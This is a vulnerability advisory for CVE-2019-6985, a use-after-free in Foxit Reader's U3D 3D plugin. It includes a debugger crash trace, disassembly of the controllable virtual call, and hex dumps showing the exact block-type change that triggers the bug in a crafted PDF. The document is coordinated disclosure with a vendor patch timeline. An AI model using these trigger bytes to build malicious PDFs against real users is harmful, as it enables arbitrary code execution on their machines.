Advisories

Foxit Reader U3D 2D Glyph Modifier Block Use-after-Free Vulnerability

CVE ID

CVE-2019-6985

Tested Versions

  • Foxit Reader 9.1.0.5096, U3DBrowser.fpi 9.1.0.425

Product URL(s)

  • https://www.foxitsoftware.com/pdf-reader/

Foxit Reader is a popular PDF reading and printing software. It provides compatibility to the ECMA-363 Standard (Universal 3D File Format) via the U3DBrowser plug-in, which allows viewing embedded 3D annotations in PDF files. Up to version 9.0.1.1049 the plug-in is loaded in its default installation package, subsequent version continues the support to its user base with the plug-in separately acquired.

Any PDF file that embeds certain specially crafted 3D content, specifically, a malformed 2D Glyph Modifier Block with a specific Chain Index, could result in a use-after-free that allows using controllable memory for a direct virtual call.

(c74.1568): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=14638f80 ebx=66eb6140 ecx=1443afd0 edx=14636fd4 esi=14696fe8 edi=14636fd4
eip=66eb6157 esp=002cd6ac ebp=002cd6b0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206

U3DBrowser!PlugInMain+0x18417:
66eb6157 8b01            mov     eax,dword ptr [ecx]  ds:0023:1443afd0=????????
0:000> u
U3DBrowser!PlugInMain+0x18417:
66eb6157 8b01            mov     eax,dword ptr [ecx]
66eb6159 8b00            mov     eax,dword ptr [eax]
66eb615b 57              push    edi
66eb615c 8b7e08          mov     edi,dword ptr [esi+8]
66eb615f 57              push    edi
66eb6160 6a00            push    0
66eb6162 ffd0            call    eax
66eb6164 56              push    esi

0:000> !heap -p -a ecx
    address 1443afd0 found in
    _DPH_HEAP_ROOT @ bd91000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                   143c1784:         1443a000             2000
    6d26a1e2 verifier!AVrfDebugPageHeapFree+0x000000c2
    76f07809 ntdll!RtlDebugFreeHeap+0x0000002f
    76ed4dee ntdll!RtlpFreeHeap+0x00000060
    76e8ddf0 ntdll!RtlFreeHeap+0x00000142
    7540c8f9 kernel32!HeapFree+0x00000014
    6a5c016a MSVCR100!free+0x0000001c
    66f91c00 U3DBrowser!PlugInMain+0x000f3ec0
    66f9312f U3DBrowser!PlugInMain+0x000f53ef
    66f9369a U3DBrowser!PlugInMain+0x000f595a
    66f1f979 U3DBrowser!PlugInMain+0x00081c39
    66f1faab U3DBrowser!PlugInMain+0x00081d6b
    [ ... ]

Vulnerability

When processing a carefully crafted PDF with 3D stream containing a displaced 2D Glyph Modifier Block (type 0xFFFFFF41) with a specific Chain Index value, an attacker can potentially achieve arbitrary code execution at the privilege of the logged on user.

Original Model Node Block of type 0xffffff22:
00000510: 00 00 00 00 02 00 00 00 22 ff ff ff 65 00 00 00  ........"...e...
00000520: 00 00 00 00 05 00 42 6f 78 30 34 01 00 00 00 05  ......Box04.....
00000530: 00 42 6f 78 30 33 00 00 80 3f 00 00 00 00 00 00  .Box03...?......
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 80 3f 00 00  .............?..
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000560: 80 3f 00 00 00 00 4b b1 ba c1 44 05 b8 c1 00 00  .?....K...D.....
00000570: 00 00 00 00 80 3f 0d 00 4c 69 67 68 74 42 6f 78  .....?..LightBox
00000580: 4d 6f 64 65 6c 01 00 00 00 00 00 00 45 ff ff ff  Model.......E...

PoC: changing the block type to 0xffffff41:
00000510: 00 00 00 00 02 00 00 00 41 ff ff ff 65 00 00 00  ........A...e...
00000520: 00 00 00 00 05 00 42 6f 78 30 34 01 00 00 00 05  ......Box04.....
00000530: 00 42 6f 78 30 33 00 00 80 3f 00 00 00 00 00 00  .Box03...?......
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 80 3f 00 00  .............?..
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000560: 80 3f 00 00 00 00 4b b1 ba c1 44 05 b8 c1 00 00  .?....K...D.....
00000570: 00 00 00 00 80 3f 0d 00 4c 69 67 68 74 42 6f 78  .....?..LightBox
00000580: 4d 6f 64 65 6c 01 00 00 00 00 00 00 45 ff ff ff  Model.......E...

Only the Chain Index 0x1 are necessary, the following almost completely zero-ed 0xffffff41 block reaches the same crash:

00000510: 00 00 00 00 02 00 00 00 41 ff ff ff 65 00 00 00  ........A...e...
00000520: 00 00 00 00 05 00 42 6f 78 30 34 01 00 00 00 01  ......Box04.....
00000530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000570: 00 00 00 00 00 00 0d 00 00 00 00 00 00 00 00 00  ................
00000580: 00 00 00 00 00 00 00 00 00 00 00 00 45 ff ff ff  ............E...

From the crash site onwards, it is clear that the referenced object is entirely in free-ed allocation, it is straightforward to control the virtual table and value of eax at .text:10026162:

.text:10026155                 mov     ecx, [esi]
.text:10026157                 mov     eax, [ecx]      ; Use-after-Free
.text:10026159                 mov     eax, [eax]      ; fetch controlled vtable[0]
.text:1002615B                 push    edi
.text:1002615C                 mov     edi, [esi+8]
.text:1002615F                 push    edi
.text:10026160                 push    0
.text:10026162                 call    eax             ; controlled virtual call

The vulnerability is triggered by changing a Model Node Block (0xffffff22) that is embedded in a Modifier Chain (0xffffff14) to a 2D Glyph Modifier Block (0xffffff41). By the ECMA-363 standard, typically Modifier Blocks (0xffffff41 - 0xffffff46) are standalone, whereas Modifier Declaration Blocks must be contained in a Modifier Chain Block.

Vendor Response

The vendor has patched the 3D plugin and acknowledged the security issues at https://www.foxitsoftware.com/support/security-bulletins.php.

Timeline

  • 2018-11-28 Vendor disclosure
  • 2019-01-03 Vendor patched

Credit

Discovered by Wei Lei of STAR Labs

Want to participate in such cutting-edge research?

We are hiring!

Find Out More